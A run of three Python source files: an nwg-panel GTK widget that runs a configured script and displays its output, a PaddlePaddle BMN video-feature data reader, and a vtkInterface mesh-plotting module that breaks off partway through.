#!/usr/bin/env python3 from gi.repository import GLib import subprocess import threading from nwg_panel.tools import check_key, update_image import gi gi.require_version('Gtk', '3.0') gi.require_version('Gdk', '3.0') from gi.repository import Gtk, Gdk, GdkPixbuf class Executor(Gtk.EventBox): def __init__(self, settings, icons_path): self.settings = settings self.icons_path = icons_path Gtk.EventBox.__init__(self) self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0) self.add(self.box) self.image = Gtk.Image() self.label = Gtk.Label("") self.icon_path = None check_key(settings, "script", "") check_key(settings, "interval", 0) check_key(settings, "css-name", "") check_key(settings, "icon-placement", "left") check_key(settings, "icon-size", 16) check_key(settings, "tooltip-text", "") check_key(settings, "on-left-click", "") check_key(settings, "on-right-click", "") check_key(settings, "on-middle-click", "") check_key(settings, "on-scroll-up", "") check_key(settings, "on-scroll-down", "") update_image(self.image, "view-refresh-symbolic", self.settings["icon-size"], self.icons_path) if settings["css-name"]: self.label.set_property("name", settings["css-name"]) else: self.label.set_property("name", "executor-label") if settings["tooltip-text"]: self.set_tooltip_text(settings["tooltip-text"]) if settings["on-left-click"] or settings["on-right-click"] or settings["on-middle-click"] or settings[ "on-scroll-up"] or settings["on-scroll-down"]: self.connect('button-press-event', self.on_button_press) self.add_events(Gdk.EventMask.SCROLL_MASK) self.connect('scroll-event', self.on_scroll) self.connect('enter-notify-event', self.on_enter_notify_event) self.connect('leave-notify-event', self.on_leave_notify_event) self.build_box() self.refresh() if settings["interval"] > 0: Gdk.threads_add_timeout_seconds(GLib.PRIORITY_LOW, settings["interval"], self.refresh) def update_widget(self, output): if output: if len(output) == 1: if output[0].endswith(".svg") or output[0].endswith(".png"): new_path = output[0].strip() if new_path != self.icon_path: if "/" not in new_path and "." not in new_path: # name given instead of path update_image(self.image, new_path, self.settings["icon-size"], self.icons_path) self.icon_path = new_path else: try: pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size( new_path, self.settings["icon-size"], self.settings["icon-size"]) self.image.set_from_pixbuf(pixbuf) self.icon_path = new_path except: print("Failed setting image from {}".format(output[0].strip())) if not self.image.get_visible(): self.image.show() if self.label.get_visible(): self.label.hide() else: if self.image.get_visible(): self.image.hide() self.label.set_text(output[0].strip()) if not self.label.get_visible(): self.label.show() elif len(output) == 2: new_path = output[0].strip() if "/" not in new_path and "." 
not in new_path: # name given instead of path update_image(self.image, new_path, self.settings["icon-size"], self.icons_path) self.icon_path = new_path else: if new_path != self.icon_path: try: pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size( new_path, self.settings["icon-size"], self.settings["icon-size"]) self.image.set_from_pixbuf(pixbuf) self.icon_path = new_path except: print("Failed setting image from {}".format(output[0].strip())) if not self.image.get_visible(): self.image.show() self.label.set_text(output[1].strip()) else: if self.image.get_visible(): self.image.hide() if self.label.get_visible(): self.label.hide() return False def get_output(self): if "script" in self.settings and self.settings["script"]: try: output = subprocess.check_output(self.settings["script"].split()).decode("utf-8").splitlines() GLib.idle_add(self.update_widget, output) except Exception as e: print(e) def refresh(self): thread = threading.Thread(target=self.get_output) thread.daemon = True thread.start() return True def build_box(self): if self.settings["icon-placement"] == "left": self.box.pack_start(self.image, False, False, 2) self.box.pack_start(self.label, False, False, 2) if self.settings["icon-placement"] != "left": self.box.pack_start(self.image, False, False, 2) def on_enter_notify_event(self, widget, event): self.get_style_context().set_state(Gtk.StateFlags.SELECTED) def on_leave_notify_event(self, widget, event): self.get_style_context().set_state(Gtk.StateFlags.NORMAL) def on_button_press(self, widget, event): if event.button == 1 and self.settings["on-left-click"]: self.launch(self.settings["on-left-click"]) elif event.button == 2 and self.settings["on-middle-click"]: self.launch(self.settings["on-middle-click"]) elif event.button == 3 and self.settings["on-right-click"]: self.launch(self.settings["on-right-click"]) def on_scroll(self, widget, event): if event.direction == Gdk.ScrollDirection.UP and self.settings["on-scroll-up"]: self.launch(self.settings["on-scroll-up"]) elif event.direction == Gdk.ScrollDirection.DOWN and self.settings["on-scroll-up"]: self.launch(self.settings["on-scroll-up"]) else: print("No command assigned") def launch(self, cmd): print("Executing '{}'".format(cmd)) subprocess.Popen('exec {}'.format(cmd), shell=True)
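# --- Hedged usage sketch (not part of nwg-panel) ---------------------------
# A settings dictionary of the shape Executor expects, based on the
# check_key() defaults above.  The commands, the 30-second interval and the
# icons directory are illustrative assumptions only; any missing keys are
# filled in with defaults by Executor.__init__().

def _executor_demo(icons_path="/usr/share/nwg-panel/icons"):  # assumed path
    settings = {
        "script": "date +%H:%M",      # single line of output becomes the label
        "interval": 30,               # refresh every 30 seconds
        "icon-placement": "left",
        "icon-size": 16,
        "tooltip-text": "Current time",
        "on-left-click": "gnome-calendar",
    }
    return Executor(settings, icons_path)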
reader.py
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. import paddle import numpy as np import random import json import multiprocessing import functools import logging import platform import os logger = logging.getLogger(__name__) from bmn_utils import iou_with_anchors, ioa_with_anchors class BMNReader(): def __init__(self, mode, cfg): self.mode = mode self.tscale = cfg.MODEL.tscale # 100 self.dscale = cfg.MODEL.dscale # 100 self.anno_file = cfg.MODEL.anno_file self.file_list = cfg.INFER.filelist self.subset = cfg[mode.upper()]['subset'] self.tgap = 1. / self.tscale self.feat_path = cfg.MODEL.feat_path self.get_dataset_dict() self.get_match_map() self.batch_size = cfg[mode.upper()]['batch_size'] self.num_threads = cfg[mode.upper()]['num_threads'] if (mode == 'test') or (mode == 'infer'): self.num_threads = 1 # set num_threads as 1 for test and infer def get_dataset_dict(self): assert (os.path.exists(self.feat_path)), "Input feature path not exists" assert (os.listdir(self.feat_path)), "No feature file in feature path" self.video_dict = {} if self.mode == "infer": annos = json.load(open(self.file_list)) for video_name in annos.keys(): self.video_dict[video_name] = annos[video_name] else: annos = json.load(open(self.anno_file)) for video_name in annos.keys(): video_subset = annos[video_name]["subset"] if self.subset in video_subset: self.video_dict[video_name] = annos[video_name] self.video_list = list(self.video_dict.keys()) self.video_list.sort() print("%s subset video numbers: %d" % (self.subset, len(self.video_list))) video_name_set = set( [video_name + '.npy' for video_name in self.video_list]) assert (video_name_set.intersection(set(os.listdir(self.feat_path))) == video_name_set), "Input feature not exists in feature path" def get_match_map(self): match_map = [] for idx in range(self.tscale): tmp_match_window = [] xmin = self.tgap * idx for jdx in range(1, self.tscale + 1): xmax = xmin + self.tgap * jdx tmp_match_window.append([xmin, xmax]) match_map.append(tmp_match_window) match_map = np.array(match_map) match_map = np.transpose(match_map, [1, 0, 2]) match_map = np.reshape(match_map, [-1, 2]) self.match_map = match_map self.anchor_xmin = [self.tgap * i for i in range(self.tscale)] self.anchor_xmax = [self.tgap * i for i in range(1, self.tscale + 1)] def get_video_label(self, video_name): video_info = self.video_dict[video_name] video_second = video_info['duration_second'] video_labels = video_info['annotations'] gt_bbox = [] gt_iou_map = [] for gt in video_labels: tmp_start = max(min(1, gt["segment"][0] / video_second), 0) tmp_end = max(min(1, gt["segment"][1] / video_second), 0) gt_bbox.append([tmp_start, tmp_end]) tmp_gt_iou_map = iou_with_anchors( self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end) tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.dscale, self.tscale]) gt_iou_map.append(tmp_gt_iou_map) gt_iou_map = np.array(gt_iou_map) gt_iou_map = np.max(gt_iou_map, axis=0) gt_bbox = np.array(gt_bbox) gt_xmins = gt_bbox[:, 0] gt_xmaxs 
= gt_bbox[:, 1] gt_len_small = 3 * self.tgap gt_start_bboxs = np.stack( (gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1) gt_end_bboxs = np.stack( (gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1) match_score_start = [] for jdx in range(len(self.anchor_xmin)): match_score_start.append( np.max( ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[ jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1]))) match_score_end = [] for jdx in range(len(self.anchor_xmin)): match_score_end.append( np.max( ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[ jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1]))) gt_start = np.array(match_score_start) gt_end = np.array(match_score_end) return gt_iou_map, gt_start, gt_end def load_file(self, video_name): file_name = video_name + ".npy" file_path = os.path.join(self.feat_path, file_name) video_feat = np.load(file_path) video_feat = video_feat.T video_feat = video_feat.astype("float32") return video_feat def create_reader(self): """reader creator for bmn model""" if self.mode == 'infer': return self.make_infer_reader() if self.num_threads == 1: return self.make_reader() else: sysstr = platform.system() if sysstr == 'Windows': return self.make_multithread_reader() else: return self.make_multiprocess_reader() def make_infer_reader(self): """reader for inference""" def reader(): batch_out = [] for video_name in self.video_list: video_idx = self.video_list.index(video_name) video_feat = self.load_file(video_name) batch_out.append((video_feat, video_idx)) if len(batch_out) == self.batch_size: yield batch_out batch_out = [] return reader def make_reader(self): """single process reader""" def reader(): video_list = self.video_list if self.mode == 'train': random.shuffle(video_list) batch_out = [] for video_name in video_list: video_idx = video_list.index(video_name) video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if self.mode == 'train' or self.mode == 'valid': batch_out.append((video_feat, gt_iou_map, gt_start, gt_end)) elif self.mode == 'test': batch_out.append( (video_feat, gt_iou_map, gt_start, gt_end, video_idx)) else: raise NotImplementedError('mode {} not implemented'.format( self.mode)) if len(batch_out) == self.batch_size: yield batch_out batch_out = [] return reader def make_multithread_reader(self): def reader(): if self.mode == 'train': random.shuffle(self.video_list) for video_name in self.video_list: video_idx = self.video_list.index(video_name) yield [video_name, video_idx] def process_data(sample, mode): video_name = sample[0] video_idx = sample[1] video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if mode == 'train' or mode == 'valid': return (video_feat, gt_iou_map, gt_start, gt_end) elif mode == 'test': return (video_feat, gt_iou_map, gt_start, gt_end, video_idx) else: raise NotImplementedError('mode {} not implemented'.format( mode)) mapper = functools.partial(process_data, mode=self.mode) def batch_reader(): xreader = paddle.reader.xmap_readers(mapper, reader, self.num_threads, 1024) batch = [] for item in xreader(): batch.append(item) if len(batch) == self.batch_size: yield batch batch = [] return batch_reader def make_multiprocess_reader(self): """multiprocess reader""" def read_into_queue(video_list, queue): batch_out = [] for video_name in video_list: video_idx = video_list.index(video_name) video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if 
self.mode == 'train' or self.mode == 'valid': batch_out.append((video_feat, gt_iou_map, gt_start, gt_end)) elif self.mode == 'test': batch_out.append( (video_feat, gt_iou_map, gt_start, gt_end, video_idx)) else: raise NotImplementedError('mode {} not implemented'.format( self.mode)) if len(batch_out) == self.batch_size: queue.put(batch_out) batch_out = [] queue.put(None) def queue_reader(): video_list = self.video_list if self.mode == 'train': random.shuffle(video_list) n = self.num_threads queue_size = 20 reader_lists = [None] * n file_num = int(len(video_list) // n) for i in range(n): if i < len(reader_lists) - 1: tmp_list = video_list[i * file_num:(i + 1) * file_num] else: tmp_list = video_list[i * file_num:] reader_lists[i] = tmp_list manager = multiprocessing.Manager() queue = manager.Queue(queue_size) p_list = [None] * len(reader_lists) for i in range(len(reader_lists)): reader_list = reader_lists[i] p_list[i] = multiprocessing.Process( target=read_into_queue, args=(reader_list, queue)) p_list[i].start() reader_num = len(reader_lists) finish_num = 0 while finish_num < reader_num: sample = queue.get() if sample is None: finish_num += 1 else: yield sample for i in range(len(p_list)): if p_list[i].is_alive(): p_list[i].join() return queue_reader
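# --- Hedged usage sketch (not part of the PaddlePaddle source above) -------
# How a training loop typically consumes the reader.  `cfg` is assumed to be
# the AttrDict-style configuration the project loads from YAML (it must
# support both cfg.MODEL.tscale attribute access and cfg['TRAIN'] item access,
# exactly as BMNReader uses it above).

def _bmn_reader_demo(cfg):
    reader = BMNReader(mode="train", cfg=cfg).create_reader()
    for batch in reader():
        # in 'train' mode each batch item is (video_feat, gt_iou_map, gt_start, gt_end)
        video_feat, gt_iou_map, gt_start, gt_end = batch[0]
        print(video_feat.shape, gt_iou_map.shape, gt_start.shape, gt_end.shape)
        break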
plotting.py
""" vtk plotting module """ from multiprocessing import Process import colorsys import numpy as np import vtkInterface import imageio import time import logging from PIL import Image log = logging.getLogger(__name__) log.setLevel('CRITICAL') try: import vtk from vtk.util import numpy_support as VN font_keys = {'arial': vtk.VTK_ARIAL, 'courier': vtk.VTK_COURIER, 'times': vtk.VTK_TIMES} except: pass def Plot(mesh, **args): """ Convenience plotting function for a vtk object Includes extra argument 'screenshot', otherwise see : help(vtkInterface.PlotClass.AddMesh) """ if 'screenshot' in args: filename = args['screenshot'] del args['screenshot'] else: filename = None if 'cpos' in args: cpos = args['cpos'] del args['cpos'] else: cpos = None # create plotting object and add mesh plobj = PlotClass() if isinstance(mesh, np.ndarray): plobj.AddPoints(mesh, **args) else: plobj.AddMesh(mesh, **args) # Set camera if cpos: plobj.SetCameraPosition(cpos) cpos = plobj.Plot(autoclose=False) # take screenshot if filename: plobj.TakeScreenShot(filename) # close and return camera position plobj.Close() return cpos def PlotArrows(cent, direction): """ Plots arrows """ plotter = PlotClass() plotter.AddArrows(cent, direction) return plotter.Plot() class PlotClass(object): """ Plotting object to display vtk meshes or numpy arrays. Example ------- plobj = PlotClass() plobj.AddMesh(mesh, color='red') plobj.AddMesh(another_mesh, color='blue') plobj.Plot() Parameters ---------- off_screen : bool, optional Renders off screen when False. Useful for automated screenshots. """ last_update_time = 0.0 def __init__(self, off_screen=False): def onTimer(iren, eventId): if 'TimerEvent' == eventId: # TODO: python binding didn't provide # third parameter, which indicate right timer id # timer_id = iren.GetCommand(44) # if timer_id != self.right_timer_id: # return self.iren.TerminateApp() """ Initialize a vtk plotting object """ self.right_timer_id = -1 self.off_screen = off_screen # initialize render window self.renderer = vtk.vtkRenderer() self.renWin = vtk.vtkRenderWindow() self.renWin.AddRenderer(self.renderer) if self.off_screen: self.renWin.SetOffScreenRendering(1) else: # Allow user to interact self.iren = vtk.vtkRenderWindowInteractor() self.iren.SetDesiredUpdateRate(30.0) self.iren.SetRenderWindow(self.renWin) istyle = vtk.vtkInteractorStyleTrackballCamera() self.iren.SetInteractorStyle(istyle) # Set background self.renderer.SetBackground(0.3, 0.3, 0.3) # initialize image filter self.ifilter = vtk.vtkWindowToImageFilter() self.ifilter.SetInput(self.renWin) self.ifilter.SetInputBufferTypeToRGB() self.ifilter.ReadFrontBufferOff() # initialize movie type self.movietype = None # add timer event if interactive render exists if hasattr(self, 'iren'): self.iren.AddObserver(vtk.vtkCommand.TimerEvent, onTimer) def Update(self, stime=1, force_redraw=True): """ Update window, redraw, process messages query Parameters ---------- stime : float, optional Duration of timer that interrupt vtkRenderWindowInteractor. force_redraw : bool, optional Call vtkRenderWindowInteractor.Render() immediately. 
""" if stime <= 0: stime = 1 if force_redraw: self.iren.Render() curr_time = time.time() if PlotClass.last_update_time > curr_time: PlotClass.last_update_time = curr_time if (curr_time - PlotClass.last_update_time) > (1.0 / self.iren.GetDesiredUpdateRate()): self.right_timer_id = self.iren.CreateRepeatingTimer(stime) self.iren.Start() self.iren.DestroyTimer(self.right_timer_id) PlotClass.last_update_time = curr_time def AddMesh( self, mesh, color=None, style=None, scalars=None, rng=None, stitle=None, showedges=True, psize=5.0, opacity=1, linethick=None, flipscalars=False, lighting=False, ncolors=256, interpolatebeforemap=False, colormap=None): """ Adds a vtk unstructured, structured, or polymesh to the plotting object Parameters ---------- mesh : vtk unstructured, structured, or polymesh A vtk unstructured, structured, or polymesh to plot. color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' Color will be overridden when scalars are input. style : string, optional Visualization style of the vtk mesh. One for the following: style='surface' style='wireframe' style='points' Defaults to 'surface' scalars : numpy array, optional Scalars used to "color" the mesh. Accepts an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. rng : 2 item list, optional Range of mapper for scalars. Defaults to minimum and maximum of scalars array. Example: [-1, 2] stitle : string, optional Scalar title. By default there is no scalar legend bar. Setting this creates the legend bar and adds a title to it. To create a bar with no title, use an empty string (i.e. ''). showedges : bool, optional Shows the edges of a mesh. Does not apply to a wireframe representation. psize : float, optional Point size. Applicable when style='points'. Default 5.0 opacity : float, optional Opacity of mesh. Should be between 0 and 1. Default 1.0 linethick : float, optional Thickness of lines. Only valid for wireframe and surface representations. Default None. flipscalars : bool, optional Flip direction of colormap. lighting : bool, optional Enable or disable Z direction lighting. True by default. ncolors : int, optional Number of colors to use when displaying scalars. Default 256. interpolatebeforemap : bool, default False Enabling makes for a smoother scalar display. Default False colormap : str, optional Colormap string. See available matplotlib colormaps. Only applicable for when displaying scalars. Defaults None (rainbow). Requires matplotlib. Returns ------- actor: vtk.vtkActor VTK actor of the mesh. 
""" # set main values self.mesh = mesh self.mapper = vtk.vtkDataSetMapper() self.mapper.SetInputData(self.mesh) actor, prop = self.AddActor(self.mapper) # Scalar formatting =================================================== if scalars is not None: # convert to numpy array if not isinstance(scalars, np.ndarray): scalars = np.asarray(scalars) # ravel if not 1 dimentional if scalars.ndim != 1: scalars = scalars.ravel() # Scalar interpolation approach if scalars.size == mesh.GetNumberOfPoints(): self.mesh.AddPointScalars(scalars, '', True) self.mapper.SetScalarModeToUsePointData() self.mapper.GetLookupTable().SetNumberOfTableValues(ncolors) if interpolatebeforemap: self.mapper.InterpolateScalarsBeforeMappingOn() elif scalars.size == mesh.GetNumberOfCells(): self.mesh.AddCellScalars(scalars, '') self.mapper.SetScalarModeToUseCellData() else: raise Exception('Number of scalars (%d) ' % scalars.size + 'must match either the number of points ' + '(%d) ' % mesh.GetNumberOfPoints() + 'or the number of cells ' + '(%d) ' % mesh.GetNumberOfCells()) # Set scalar range if not rng: rng = [np.nanmin(scalars), np.nanmax(scalars)] elif isinstance(rng, float): rng = [-rng, rng] if np.any(rng): self.mapper.SetScalarRange(rng[0], rng[1]) # Flip if requested table = self.mapper.GetLookupTable() if colormap is not None: try: from matplotlib.cm import get_cmap except ImportError: raise Exception('colormap requires matplotlib') cmap = get_cmap(colormap) ctable = cmap(np.linspace(0, 1, ncolors))*255 ctable = ctable.astype(np.uint8) if flipscalars: ctable = np.ascontiguousarray(ctable[::-1]) table.SetTable(VN.numpy_to_vtk(ctable)) # change direction of colormap # if flipscalars: # table.ForceBuild() # ctable = VN.vtk_to_numpy(table.GetTable()) # table.SetTable(VN.numpy_to_vtk(ctable)) else: self.mapper.SetScalarModeToUseFieldData() # select view style if not style: style = 'surface' style = style.lower() if style == 'wireframe': prop.SetRepresentationToWireframe() elif style == 'points': prop.SetRepresentationToPoints() elif style == 'surface': prop.SetRepresentationToSurface() else: raise Exception('Invalid style. Must be one of the following:\n' + '\t"surface"\n' + '\t"wireframe"\n' + '\t"points"\n') prop.SetPointSize(psize) # edge display style if showedges: prop.EdgeVisibilityOn() prop.SetColor(ParseColor(color)) prop.SetOpacity(opacity) # lighting display style if lighting is False: prop.LightingOff() # set line thickness if linethick: prop.SetLineWidth(linethick) # Add scalar bar if available if stitle is not None: self.AddScalarBar(stitle) return actor def AddActor(self, uinput): """adds an actor to render window. creates an actor if input is a mapper""" if isinstance(uinput, vtk.vtkMapper): actor = vtk.vtkActor() actor.SetMapper(uinput) else: actor = uinput self.renderer.AddActor(actor) return actor, actor.GetProperty() def AddBoundsAxes(self, mesh=None, bounds=None, show_xaxis=True, show_yaxis=True, show_zaxis=True, show_xlabels=True, show_ylabels=True, show_zlabels=True, italic=False, bold=True, shadow=False, fontsize=16, font_family='courier', color='w', xtitle='X Axis', ytitle='Y Axis', ztitle='Z Axis', use_2dmode=True): """ Adds bounds axes. Shows the bounds of the most recent input mesh unless mesh is specified. Parameters ---------- mesh : vtkPolydata or unstructured grid, optional Input mesh to draw bounds axes around bounds : list or tuple, optional Bounds to override mesh bounds. [xmin, xmax, ymin, ymax, zmin, zmax] show_xaxis : bool, optional Makes x axis visible. Default True. 
show_yaxis : bool, optional Makes y axis visible. Default True. show_zaxis : bool, optional Makes z axis visible. Default True. show_xlabels : bool, optional Shows x labels. Default True. show_ylabels : bool, optional Shows y labels. Default True. show_zlabels : bool, optional Shows z labels. Default True. italic : bool, optional Italicises axis labels and numbers. Default False. bold : bool, optional Bolds axis labels and numbers. Default True. shadow : bool, optional Adds a black shadow to the text. Default False. fontsize : float, optional Sets the size of the label font. Defaults to 16. font_family : string, optional Font family. Must be either courier, times, or arial. color : string or 3 item list, optional Color of all labels and axis titles. Default white. Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' xtitle : string, optional Title of the x axis. Default "X Axis" ytitle : string, optional Title of the y axis. Default "Y Axis" ztitle : string, optional Title of the z axis. Default "Z Axis" use_2dmode : bool, optional A bug with vtk 6.3 in Windows seems to cause this function to crash this can be enabled for smoother plotting for other enviornments. Returns ------- cubeAxesActor : vtk.vtkCubeAxesActor Bounds actor """ # Use last input mesh if availble if not mesh and not bounds: if not hasattr(self, 'mesh'): raise Exception('Specify bounds or first input a mesh') mesh = self.mesh # create actor cubeAxesActor = vtk.vtkCubeAxesActor() cubeAxesActor.SetUse2DMode(False) # set bounds if not bounds: bounds = mesh.GetBounds() cubeAxesActor.SetBounds(mesh.GetBounds()) # show or hide axes cubeAxesActor.SetXAxisVisibility(show_xaxis) cubeAxesActor.SetYAxisVisibility(show_yaxis) cubeAxesActor.SetZAxisVisibility(show_zaxis) # disable minor ticks cubeAxesActor.XAxisMinorTickVisibilityOff() cubeAxesActor.YAxisMinorTickVisibilityOff() cubeAxesActor.ZAxisMinorTickVisibilityOff() cubeAxesActor.SetCamera(self.renderer.GetActiveCamera()) # set color color = ParseColor(color) cubeAxesActor.GetXAxesLinesProperty().SetColor(color) cubeAxesActor.GetYAxesLinesProperty().SetColor(color) cubeAxesActor.GetZAxesLinesProperty().SetColor(color) # empty arr empty_str = vtk.vtkStringArray() empty_str.InsertNextValue('') # show lines if show_xaxis: cubeAxesActor.SetXTitle(xtitle) else: cubeAxesActor.SetXTitle('') cubeAxesActor.SetAxisLabels(0, empty_str) if show_yaxis: cubeAxesActor.SetYTitle(ytitle) else: cubeAxesActor.SetYTitle('') cubeAxesActor.SetAxisLabels(1, empty_str) if show_zaxis: cubeAxesActor.SetZTitle(ztitle) else: cubeAxesActor.SetZTitle('') cubeAxesActor.SetAxisLabels(2, empty_str) # show labels if not show_xlabels: cubeAxesActor.SetAxisLabels(0, empty_str) if not show_ylabels: cubeAxesActor.SetAxisLabels(1, empty_str) if not show_zlabels: cubeAxesActor.SetAxisLabels(2, empty_str) # set font font_family = ParseFontFamily(font_family) for i in range(3): cubeAxesActor.GetTitleTextProperty(i).SetFontSize(fontsize) cubeAxesActor.GetTitleTextProperty(i).SetColor(color) cubeAxesActor.GetTitleTextProperty(i).SetFontFamily(font_family) cubeAxesActor.GetTitleTextProperty(i).SetBold(bold) cubeAxesActor.GetLabelTextProperty(i).SetFontSize(fontsize) cubeAxesActor.GetLabelTextProperty(i).SetColor(color) cubeAxesActor.GetLabelTextProperty(i).SetFontFamily(font_family) cubeAxesActor.GetLabelTextProperty(i).SetBold(bold) self.AddActor(cubeAxesActor) self.cubeAxesActor = cubeAxesActor return cubeAxesActor def AddScalarBar(self, title=None, 
nlabels=5, italic=False, bold=True, title_fontsize=None, label_fontsize=None, color=None, font_family='courier', shadow=False): """ Creates scalar bar using the ranges as set by the last input mesh. Parameters ---------- title : string, optional Title of the scalar bar. Default None nlabels : int, optional Number of labels to use for the scalar bar. italic : bool, optional Italicises title and bar labels. Default False. bold : bool, optional Bolds title and bar labels. Default True title_fontsize : float, optional Sets the size of the title font. Defaults to None and is sized automatically. label_fontsize : float, optional Sets the size of the title font. Defaults to None and is sized automatically. color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' font_family : string, optional Font family. Must be either courier, times, or arial. shadow : bool, optional Adds a black shadow to the text. Defaults to False Notes ----- Setting title_fontsize, or label_fontsize disables automatic font sizing for both the title and label. """ # check if maper exists if not hasattr(self, 'mapper'): raise Exception('Mapper does not exist. ' + 'Add a mesh with scalars first.') # parse color color = ParseColor(color) # Create scalar bar self.scalarBar = vtk.vtkScalarBarActor() self.scalarBar.SetLookupTable(self.mapper.GetLookupTable()) self.scalarBar.SetNumberOfLabels(nlabels) if label_fontsize or title_fontsize: self.scalarBar.UnconstrainedFontSizeOn() if nlabels: label_text = self.scalarBar.GetLabelTextProperty() label_text.SetColor(color) label_text.SetShadow(shadow) # Set font label_text.SetFontFamily(ParseFontFamily(font_family)) label_text.SetItalic(italic) label_text.SetBold(bold) if label_fontsize: label_text.SetFontSize(label_fontsize) # Set properties if title: self.scalarBar.SetTitle(title) title_text = self.scalarBar.GetTitleTextProperty() title_text.SetItalic(italic) title_text.SetBold(bold) title_text.SetShadow(shadow) if title_fontsize: title_text.SetFontSize(title_fontsize) # Set font title_text.SetFontFamily(ParseFontFamily(font_family)) # set color title_text.SetColor(color) self.renderer.AddActor(self.scalarBar) def UpdateScalars(self, scalars, mesh=None, render=True): """ updates scalars of object (point only for now) assumes last inputted mesh if mesh left empty """ if mesh is None: mesh = self.mesh # get pointer to active point scalars if scalars.shape[0] == mesh.GetNumberOfPoints(): s = VN.vtk_to_numpy(self.mesh.GetPointData().GetScalars()) s[:] = scalars # get pointer to active cell scalars elif scalars.shape[0] == mesh.GetNumberOfCells(): s = VN.vtk_to_numpy(self.mesh.GetCellData().GetScalars()) s[:] = scalars if render: self.Render() def UpdatePointScalars(self, scalars, points=None, render=True): """ updates scalars of object (point only for now) assumes last inputted mesh if mesh left empty """ if points is None: points = self.points # get pointer to active point scalars if scalars.shape[0] == points.GetNumberOfPoints(): s = VN.vtk_to_numpy(points.GetPointData().GetScalars()) s[:] = scalars if render: self.Render() def UpdateCoordinates(self, points, mesh=None, render=True): """ Updates points of object (point only for now) assumes last inputted mesh if mesh left empty """ if mesh is None: mesh = self.mesh mesh.points = points if render: self.Render() def Close(self): """ closes render window """ if hasattr(self, 'renWin'): self.renWin.Finalize() del self.renWin 
if hasattr(self, 'iren'): del self.iren if hasattr(self, 'textActor'): del self.textActor # end movie if hasattr(self, 'mwriter'): try: self.mwriter.close() except BaseException: pass if hasattr(self, 'ifilter'): del self.ifilter def AddText(self, text, position=[10, 10], fontsize=50, color=None, font='courier', shadow=False): """ Adds text to plot object Parameters ---------- font : string, optional Font name may be courier, times, or arial shadow : bool, optional Adds a black shadow to the text. Defaults to False Returns ------- textActor : vtk.vtkTextActor Text actor added to plot """ self.textActor = vtk.vtkTextActor() self.textActor.SetPosition(position) self.textActor.GetTextProperty().SetFontSize(fontsize) self.textActor.GetTextProperty().SetColor(ParseColor(color)) self.textActor.GetTextProperty().SetFontFamily(font_keys[font]) self.textActor.GetTextProperty().SetShadow(shadow) self.textActor.SetInput(text) self.AddActor(self.textActor) return self.textActor def OpenMovie(self, filename, framerate=24, codec='libx264', preset='medium'): """ Establishes a connection to the ffmpeg writer """ # Attempt to load moviepy try: import moviepy.video.io.ffmpeg_writer as mwrite except BaseException: print('\n\nTo use this feature install moviepy and ffmpeg\n\n') import moviepy.video.io.ffmpeg_writer as mwrite # Create movie object and check if render window is active self.window_size = self.renWin.GetSize() if not self.window_size[0]: raise Exception('Run Plot first') self.mwriter = mwrite.FFMPEG_VideoWriter(filename, self.window_size, framerate, codec=codec, preset=preset) self.movietype = 'mp4' def OpenGif(self, filename): if filename[-3:] != 'gif': raise Exception('Unsupported filetype') self.mwriter = imageio.get_writer(filename, mode='I') def WriteFrame(self): """ Writes a single frame to the movie file """ if self.movietype is 'mp4': self.mwriter.write_frame(self.GetImage()) else: self.mwriter.append_data(self.GetImage()) def GetImage(self): """ Returns an image array of current render window """ window_size = self.renWin.GetSize() # Update filter and grab pixels self.ifilter.Modified() self.ifilter.Update() image = self.ifilter.GetOutput() img_array = vtkInterface.GetPointScalars(image, 'ImageScalars') # Reshape and write return img_array.reshape((window_size[1], window_size[0], -1))[::-1] def AddLines(self, lines, color=[1, 1, 1], width=5): """ Adds an actor to the renderwindow """ if isinstance(lines, np.ndarray): lines = vtkInterface.MakeLine(lines) # Create mapper and add lines mapper = vtk.vtkDataSetMapper() vtkInterface.SetVTKInput(mapper, lines) # Create Actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetLineWidth(width) actor.GetProperty().EdgeVisibilityOn() actor.GetProperty().SetEdgeColor(color) actor.GetProperty().SetColor(ParseColor(color)) actor.GetProperty().LightingOff() # Add to renderer self.renderer.AddActor(actor) def AddPointLabels(self, points, labels, bold=True, fontsize=16, textcolor='k', font_family='courier', shadow=False, showpoints=True, pointcolor='k', pointsize=5): """ Creates a point actor with one label from list labels assigned to each point. Parameters ---------- points : np.ndarray 3 x n numpy array of points. labels : list List of labels. Must be the same length as points. italic : bool, optional Italicises title and bar labels. Default False. bold : bool, optional Bolds title and bar labels. Default True fontsize : float, optional Sets the size of the title font. Defaults to 16. 
